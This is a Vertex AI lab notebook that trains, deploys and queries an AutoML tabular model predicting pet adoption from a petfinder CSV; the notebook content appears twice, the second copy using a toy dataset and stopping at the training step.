Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.4.8)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (1.26.6)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2.10)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2021.5.30)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (4.0.0)
Installing collected packages: google-cloud-storage
Successfully installed google-cloud-storage-1.42.0
###Markdown
Restart the kernelAfter you install the additional packages, you need to restart the notebook kernel so it can find the packages.
###Code
# Automatically restart kernel after installs
import os
if not os.getenv("IS_TESTING"):
# Automatically restart kernel after installs
import IPython
app = IPython.Application.instance()
app.kernel.do_shutdown(True)
###Output
_____no_output_____
###Markdown
Set your project ID**If you don't know your project ID**, you may be able to get your project ID using `gcloud`.
###Code
import os
PROJECT_ID = ""
# Get your Google Cloud project ID from gcloud
if not os.getenv("IS_TESTING"):
shell_output=!gcloud config list --format 'value(core.project)' 2>/dev/null
PROJECT_ID = shell_output[0]
print("Project ID: ", PROJECT_ID)
###Output
Project ID: qwiklabs-gcp-04-c846b6079446
###Markdown
Otherwise, set your project ID here.
###Code
if PROJECT_ID == "" or PROJECT_ID is None:
PROJECT_ID = "qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
###Output
_____no_output_____
###Markdown
TimestampIf you are in a live tutorial session, you might be using a shared test account or project. To avoid name collisions between users on resources created, you create a timestamp for each instance session, and append it onto the name of resources you create in this tutorial.
###Code
# Import necessary libraries
from datetime import datetime
# Use a timestamp to ensure unique resources
TIMESTAMP = datetime.now().strftime("%Y%m%d%H%M%S")
###Output
_____no_output_____
###Markdown
Create a Cloud Storage bucket**The following steps are required, regardless of your notebook environment.**This notebook demonstrates how to use Model Builder SDK to create an AutoML model based on a tabular dataset. You will need to provide a Cloud Storage bucket where the dataset will be stored.Set the name of your Cloud Storage bucket below. It must be unique across all of your Cloud Storage buckets.You may also change the `REGION` variable, which is used for operationsthroughout the rest of this notebook. Make sure to [choose a region where Vertex AI services areavailable](https://cloud.google.com/vertex-ai/docs/general/locations). You maynot use a Multi-Regional Storage bucket for training with Vertex AI.
###Code
BUCKET_NAME = "gs://qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
REGION = "us-central1" # @param {type:"string"}
if BUCKET_NAME == "" or BUCKET_NAME is None or BUCKET_NAME == "gs://qwiklabs-gcp-04-c846b6079446":
BUCKET_NAME = "gs://" + PROJECT_ID + "aip-" + TIMESTAMP
###Output
_____no_output_____
###Markdown
**Only if your bucket doesn't already exist**: Run the following cell to create your Cloud Storage bucket.
###Code
! gsutil mb -l $REGION $BUCKET_NAME
###Output
Creating gs://qwiklabs-gcp-04-c846b6079446aip-20210826051658/...
###Markdown
Finally, validate access to your Cloud Storage bucket by examining its contents:
###Code
! gsutil ls -al $BUCKET_NAME
###Output
_____no_output_____
###Markdown
Copy dataset into your Cloud Storage bucket
###Code
IMPORT_FILE = "petfinder-tabular-classification.csv"
! gsutil cp gs://cloud-samples-data/ai-platform-unified/datasets/tabular/{IMPORT_FILE} {BUCKET_NAME}/data/
gcs_source = f"{BUCKET_NAME}/data/{IMPORT_FILE}"
###Output
Copying gs://cloud-samples-data/ai-platform-unified/datasets/tabular/petfinder-tabular-classification.csv [Content-Type=text/csv]...
/ [1 files][872.8 KiB/872.8 KiB]
Operation completed over 1 objects/872.8 KiB.
###Markdown
Import Vertex SDK for PythonImport the Vertex SDK into your Python environment and initialize it.
###Code
# Import necessary libraries
import os
from google.cloud import aiplatform
aiplatform.init(project=PROJECT_ID, location=REGION)
###Output
_____no_output_____
###Markdown
TutorialNow you are ready to create your AutoML Tabular model. Create a Managed Tabular Dataset from a CSVThis section will create a dataset from a CSV file stored on your GCS bucket.
###Code
ds = dataset = aiplatform.TabularDataset.create(
display_name="petfinder-tabular-dataset",
gcs_source=gcs_source,
)
ds.resource_name
###Output
INFO:google.cloud.aiplatform.datasets.dataset:Creating TabularDataset
INFO:google.cloud.aiplatform.datasets.dataset:Create TabularDataset backing LRO: projects/1075205415941/locations/us-central1/datasets/1945247175768276992/operations/1110822578768838656
INFO:google.cloud.aiplatform.datasets.dataset:TabularDataset created. Resource name: projects/1075205415941/locations/us-central1/datasets/1945247175768276992
INFO:google.cloud.aiplatform.datasets.dataset:To use this TabularDataset in another session:
INFO:google.cloud.aiplatform.datasets.dataset:ds = aiplatform.TabularDataset('projects/1075205415941/locations/us-central1/datasets/1945247175768276992')
###Markdown
Launch a Training Job to Create a ModelOnce we have defined your training script, we will create a model. The `run` function creates a training pipeline that trains and creates a `Model` object. After the training pipeline completes, the `run` function returns the `Model` object.
###Code
# TODO 1
# Constructs a AutoML Tabular Training Job
job = aiplatform.AutoMLTabularTrainingJob(
display_name="train-petfinder-automl-1",
optimization_prediction_type="classification",
column_transformations=[
{"categorical": {"column_name": "Type"}},
{"numeric": {"column_name": "Age"}},
{"categorical": {"column_name": "Breed1"}},
{"categorical": {"column_name": "Color1"}},
{"categorical": {"column_name": "Color2"}},
{"categorical": {"column_name": "MaturitySize"}},
{"categorical": {"column_name": "FurLength"}},
{"categorical": {"column_name": "Vaccinated"}},
{"categorical": {"column_name": "Sterilized"}},
{"categorical": {"column_name": "Health"}},
{"numeric": {"column_name": "Fee"}},
{"numeric": {"column_name": "PhotoAmt"}},
],
)
# TODO 2a
# Create and train the model object
# This will take around two hour and half to run
model = job.run(
dataset=ds,
target_column="Adopted",
# TODO 2b
# Define training, validation and test fraction for training
training_fraction_split=0.8,
validation_fraction_split=0.1,
test_fraction_split=0.1,
model_display_name="adopted-prediction-model",
disable_early_stopping=False,
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
/opt/conda/lib/python3.7/site-packages/ipykernel_launcher.py:16: DeprecationWarning: consider using column_specs instead. column_transformations will be deprecated in the future.
app.launch_new_instance()
###Markdown
Deploy your modelBefore you use your model to make predictions, you need to deploy it to an `Endpoint`. You can do this by calling the `deploy` function on the `Model` resource. This function does two things:1. Creates an `Endpoint` resource to which the `Model` resource will be deployed.2. Deploys the `Model` resource to the `Endpoint` resource.Deploy your model. NOTE: Wait until the model **FINISHES** deployment before proceeding to prediction.
###Code
# TODO 3
# Deploy the model resource to the serving endpoint resource
endpoint = model.deploy(
machine_type="n1-standard-4",
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Predict on the endpoint * This sample instance is taken from an observation in which `Adopted` = **Yes*** Note that the values are all strings. Since the original data was in CSV format, everything is treated as a string. The transformations you defined when creating your `AutoMLTabularTrainingJob` inform Vertex AI to transform the inputs to their defined types.
###Code
# TODO 4
# Make a prediction using the sample values
prediction = endpoint.predict(
[
{
"Type": "Cat",
"Age": "3",
"Breed1": "Tabby",
"Gender": "Male",
"Color1": "Black",
"Color2": "White",
"MaturitySize": "Small",
"FurLength": "Short",
"Vaccinated": "No",
"Sterilized": "No",
"Health": "Healthy",
"Fee": "100",
"PhotoAmt": "2",
}
]
)
print(prediction)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Undeploy the modelTo undeploy your `Model` resource from the serving `Endpoint` resource, use the endpoint's `undeploy` method with the following parameter:- `deployed_model_id`: The model deployment identifier returned by the prediction service when the `Model` resource is deployed. You can retrieve the `deployed_model_id` using the prediction object's `deployed_model_id` property.
###Code
# TODO 5
# Undeploy the model resource
endpoint.undeploy(deployed_model_id=prediction.deployed_model_id)
###Output
INFO:google.cloud.aiplatform.models:Undeploying Endpoint model: projects/1075205415941/locations/us-central1/endpoints/7467372802459303936
###Markdown
Cleaning upTo clean up all Google Cloud resources used in this project, you can [delete the Google Cloud project](https://cloud.google.com/resource-manager/docs/creating-managing-projectsshutting_down_projects) you used for the tutorial.Otherwise, you can delete the individual resources you created in this tutorial:- Training Job- Model- Endpoint- Cloud Storage Bucket**Note**: You must delete any `Model` resources deployed to the `Endpoint` resource before deleting the `Endpoint` resource.
###Code
delete_training_job = True
delete_model = True
delete_endpoint = True
# Warning: Setting this to true will delete everything in your bucket
delete_bucket = False
# Delete the training job
if delete_training_job:
    job.delete()
# Delete the model
if delete_model:
    model.delete()
# Delete the endpoint
if delete_endpoint:
    endpoint.delete()
if delete_bucket and "BUCKET_NAME" in globals():
    ! gsutil -m rm -r $BUCKET_NAME
###Output
INFO:google.cloud.aiplatform.base:Deleting AutoMLTabularTrainingJob : projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Delete AutoMLTabularTrainingJob backing LRO: projects/1075205415941/locations/us-central1/operations/5317466105709592576
INFO:google.cloud.aiplatform.base:AutoMLTabularTrainingJob deleted. . Resource name: projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Deleting Model : projects/1075205415941/locations/us-central1/models/3676687718445744128
###Markdown
Vertex AI Model Builder SDK: AutoML Tabular Training and Prediction OverviewIn this notebook, you learn how to use the Vertex AI Python client library to train and deploy a tabular classification model for online prediction. Learning ObjectiveIn this notebook, you learn how to:* Create a Vertex AI model training job.* Train an AutoML tabular model.* Deploy the `model` resource to a serving `endpoint` resource.* Make a prediction by sending data.* Undeploy the `model` resource. IntroductionIn this notebook, you will use Vertex AI Python client library to train and make predictions on an AutoML model based on a tabular dataset. Alternatively, you can train and make predictions on models by using the gcloud command-line tool or by using the online Cloud Console.Each learning objective will correspond to a __TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/automl-tabular-classification.ipynb). **Make sure to enable the Vertex AI API and Compute Engine API.** Installation
###Code
# Setup your dependencies
import os
# The Google Cloud Notebook product has specific requirements
IS_GOOGLE_CLOUD_NOTEBOOK = os.path.exists("/opt/deeplearning/metadata/env_version")
USER_FLAG = ""
# Google Cloud Notebook requires dependencies to be installed with '--user'
if IS_GOOGLE_CLOUD_NOTEBOOK:
USER_FLAG = "--user"
###Output
_____no_output_____
###Markdown
Install the latest version of the Vertex AI client library.Run the following command in your virtual environment to install the Vertex SDK for Python:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-aiplatform
###Output
Requirement already satisfied: google-cloud-aiplatform in /opt/conda/lib/python3.7/site-packages (1.1.1)
Collecting google-cloud-aiplatform
Downloading google_cloud_aiplatform-1.3.0-py2.py3-none-any.whl (1.3 MB)
[K |████████████████████████████████| 1.3 MB 7.6 MB/s eta 0:00:01
[?25hRequirement already satisfied: proto-plus>=1.10.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.19.0)
Requirement already satisfied: google-cloud-bigquery<3.0.0dev,>=1.15.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (2.23.2)
Requirement already satisfied: google-api-core[grpc]<3.0.0dev,>=1.26.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.31.1)
Requirement already satisfied: google-cloud-storage<2.0.0dev,>=1.32.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.41.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (21.0)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.53.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.1)
Requirement already satisfied: google-auth<2.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.34.0)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.25.1)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (49.6.0.post20210108)
Requirement already satisfied: grpcio<2.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.38.1)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.7.2)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.2.7)
Requirement already satisfied: google-resumable-media<3.0dev,>=0.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.3.2)
Requirement already satisfied: google-cloud-core<3.0.0dev,>=1.4.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-cloud-aiplatform) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.4.8)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.5.30)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.26.6)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.0.0)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.10)
Installing collected packages: google-cloud-aiplatform
[33m WARNING: The script tb-gcp-uploader is installed in '/home/jupyter/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.[0m
Successfully installed google-cloud-aiplatform-1.3.0
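After the install (and the kernel restart below), it can help to confirm which SDK version the kernel actually picked up. A small sketch using `pkg_resources`, which ships with setuptools:

```python
# Print the installed google-cloud-aiplatform version to confirm the upgrade took effect.
import pkg_resources

print(pkg_resources.get_distribution("google-cloud-aiplatform").version)
```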
###Markdown
Install the Cloud Storage library:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-storage
###Output
Requirement already satisfied: google-cloud-storage in /opt/conda/lib/python3.7/site-packages (1.41.1)
Collecting google-cloud-storage
Downloading google_cloud_storage-1.42.0-py2.py3-none-any.whl (105 kB)
[K |████████████████████████████████| 105 kB 8.1 MB/s eta 0:00:01
[?25hRequirement already satisfied: google-resumable-media<3.0dev,>=1.3.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.3.2)
Requirement already satisfied: google-auth<3.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.34.0)
Requirement already satisfied: google-cloud-core<3.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.7.2)
Requirement already satisfied: google-api-core<3.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.31.1)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (2.25.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (21.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2021.1)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.53.0)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (49.6.0.post20210108)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.2.7)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.4.8)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (1.26.6)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2.10)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2021.5.30)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (4.0.0)
Installing collected packages: google-cloud-storage
Successfully installed google-cloud-storage-1.42.0
###Markdown
Restart the kernelAfter you install the additional packages, you need to restart the notebook kernel so it can find the packages.
###Code
# Automatically restart kernel after installs
import os
if not os.getenv("IS_TESTING"):
# Automatically restart kernel after installs
import IPython
app = IPython.Application.instance()
app.kernel.do_shutdown(True)
###Output
_____no_output_____
###Markdown
Set your project ID**If you don't know your project ID**, you may be able to get your project ID using `gcloud`.
###Code
import os
PROJECT_ID = ""
# Get your Google Cloud project ID from gcloud
if not os.getenv("IS_TESTING"):
shell_output=!gcloud config list --format 'value(core.project)' 2>/dev/null
PROJECT_ID = shell_output[0]
print("Project ID: ", PROJECT_ID)
###Output
Project ID: qwiklabs-gcp-04-c846b6079446
###Markdown
Otherwise, set your project ID here.
###Code
if PROJECT_ID == "" or PROJECT_ID is None:
PROJECT_ID = "qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
###Output
_____no_output_____
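If `gcloud` is not configured in your environment, the Application Default Credentials usually carry a project as well. A hedged alternative sketch using `google.auth` (already installed as a dependency of the SDK); the fallback only fires when `PROJECT_ID` is still empty:

```python
# Fall back to the project associated with Application Default Credentials, if any.
import google.auth

if not PROJECT_ID:
    _, adc_project = google.auth.default()
    if adc_project:
        PROJECT_ID = adc_project
print("Project ID:", PROJECT_ID)
```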
###Markdown
TimestampIf you are in a live tutorial session, you might be using a shared test account or project. To avoid name collisions between users on resources created, you create a timestamp for each instance session, and append it onto the name of resources you create in this tutorial.
###Code
# Import necessary libraries
from datetime import datetime
# Use a timestamp to ensure unique resources
TIMESTAMP = datetime.now().strftime("%Y%m%d%H%M%S")
###Output
_____no_output_____
###Markdown
Create a Cloud Storage bucket**The following steps are required, regardless of your notebook environment.** This notebook demonstrates how to use the Model Builder SDK to create an AutoML model based on a tabular dataset. You will need to provide a Cloud Storage bucket where the dataset will be stored. Set the name of your Cloud Storage bucket below. It must be unique across all of your Cloud Storage buckets. You may also change the `REGION` variable, which is used for operations throughout the rest of this notebook. Make sure to [choose a region where Vertex AI services are available](https://cloud.google.com/vertex-ai/docs/general/locations). You may not use a Multi-Regional Storage bucket for training with Vertex AI.
###Code
BUCKET_NAME = "gs://qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
REGION = "us-central1" # @param {type:"string"}
if BUCKET_NAME == "" or BUCKET_NAME is None or BUCKET_NAME == "gs://qwiklabs-gcp-04-c846b6079446":
BUCKET_NAME = "gs://" + PROJECT_ID + "aip-" + TIMESTAMP
###Output
_____no_output_____
###Markdown
**Only if your bucket doesn't already exist**: Run the following cell to create your Cloud Storage bucket.
###Code
! gsutil mb -l $REGION $BUCKET_NAME
###Output
Creating gs://qwiklabs-gcp-04-c846b6079446aip-20210826051658/...
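If you prefer to stay in Python rather than shell out to `gsutil`, the `google-cloud-storage` client installed earlier can create and check the bucket. A sketch assuming `PROJECT_ID`, `BUCKET_NAME`, and `REGION` from the cells above (note the client API takes the bare bucket name without the `gs://` prefix):

```python
# Create the bucket with the storage client if it does not exist yet.
from google.cloud import storage

storage_client = storage.Client(project=PROJECT_ID)
bucket_name = BUCKET_NAME.replace("gs://", "")

if storage_client.lookup_bucket(bucket_name) is None:
    storage_client.create_bucket(bucket_name, location=REGION)
    print(f"Created bucket {bucket_name} in {REGION}")
else:
    print(f"Bucket {bucket_name} already exists")
```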
###Markdown
Finally, validate access to your Cloud Storage bucket by examining its contents:
###Code
! gsutil ls -al $BUCKET_NAME
###Output
_____no_output_____
###Markdown
Copy dataset into your Cloud Storage bucket
###Code
IMPORT_FILE = "petfinder-tabular-classification_toy.csv"
! gsutil cp gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/{IMPORT_FILE} {BUCKET_NAME}/data/
gcs_source = f"{BUCKET_NAME}/data/{IMPORT_FILE}"
###Output
Copying gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/petfinder-tabular-classification_toy.csv [Content-Type=text/csv]...
[1 files][378.2 KiB/378.2 KiB]
Operation completed over 1 objects/378.2 KiB.
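Before handing the CSV to Vertex AI, it is worth a quick sanity check that the file has the expected columns, in particular the `Adopted` target used later. A hedged sketch with pandas (reading `gs://` paths requires the `gcsfs` package in the kernel):

```python
# Peek at the first rows of the copied dataset; requires gcsfs for gs:// paths.
import pandas as pd

df_preview = pd.read_csv(gcs_source, nrows=5)
print(df_preview.columns.tolist())
print(df_preview.head())
assert "Adopted" in df_preview.columns, "Target column missing from the CSV"
```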
###Markdown
Import Vertex SDK for PythonImport the Vertex SDK into your Python environment and initialize it.
###Code
# Import necessary libraries
import os
from google.cloud import aiplatform
aiplatform.init(project=PROJECT_ID, location=REGION)
###Output
_____no_output_____
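If you plan to run custom training or batch jobs later, `aiplatform.init` also accepts a `staging_bucket`, which saves you from passing the bucket to every call. A small optional sketch, assuming the bucket created above:

```python
# Optionally register the staging bucket once, so later SDK calls can omit it.
from google.cloud import aiplatform

aiplatform.init(project=PROJECT_ID, location=REGION, staging_bucket=BUCKET_NAME)
```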
###Markdown
TutorialNow you are ready to create your AutoML Tabular model. Create a Managed Tabular Dataset from a CSVThis section will create a dataset from a CSV file stored on your GCS bucket.
###Code
ds = dataset = aiplatform.TabularDataset.create(
display_name="petfinder-tabular-dataset",
gcs_source=gcs_source,
)
ds.resource_name
###Output
INFO:google.cloud.aiplatform.datasets.dataset:Creating TabularDataset
INFO:google.cloud.aiplatform.datasets.dataset:Create TabularDataset backing LRO: projects/1075205415941/locations/us-central1/datasets/1945247175768276992/operations/1110822578768838656
INFO:google.cloud.aiplatform.datasets.dataset:TabularDataset created. Resource name: projects/1075205415941/locations/us-central1/datasets/1945247175768276992
INFO:google.cloud.aiplatform.datasets.dataset:To use this TabularDataset in another session:
INFO:google.cloud.aiplatform.datasets.dataset:ds = aiplatform.TabularDataset('projects/1075205415941/locations/us-central1/datasets/1945247175768276992')
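As the log output notes, the managed dataset can be re-attached in a later session from its resource name instead of being re-created. A hedged sketch (the `column_names` property is exposed on `TabularDataset` in recent SDK versions; fall back to inspecting the CSV if it is not available):

```python
# Reuse an existing managed dataset by resource name rather than re-importing the CSV.
existing_ds = aiplatform.TabularDataset(ds.resource_name)
print(existing_ds.display_name)
print(existing_ds.column_names)  # handy when building column specifications later
```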
###Markdown
Launch a Training Job to Create a ModelWith the managed dataset in place, you can now define and run the AutoML training job. The `run` function creates a training pipeline that trains and creates a `Model` object. After the training pipeline completes, the `run` function returns the `Model` object.
###Code
# TODO 1
# Construct an AutoML Tabular Training Job
job = aiplatform.AutoMLTabularTrainingJob(
display_name="train-petfinder-automl-1",
optimization_prediction_type="classification",
column_transformations=[
{"categorical": {"column_name": "Type"}},
{"numeric": {"column_name": "Age"}},
{"categorical": {"column_name": "Breed1"}},
{"categorical": {"column_name": "Color1"}},
{"categorical": {"column_name": "Color2"}},
{"categorical": {"column_name": "MaturitySize"}},
{"categorical": {"column_name": "FurLength"}},
{"categorical": {"column_name": "Vaccinated"}},
{"categorical": {"column_name": "Sterilized"}},
{"categorical": {"column_name": "Health"}},
{"numeric": {"column_name": "Fee"}},
{"numeric": {"column_name": "PhotoAmt"}},
],
)
# TODO 2a
# Create and train the model object
# This will take around two and a half hours to run
model = job.run(
dataset=ds,
target_column="Adopted",
# TODO 2b
# Define training, validation and test fraction for training
training_fraction_split=0.8,
validation_fraction_split=0.1,
test_fraction_split=0.1,
model_display_name="adopted-prediction-model",
disable_early_stopping=False,
)
###Output
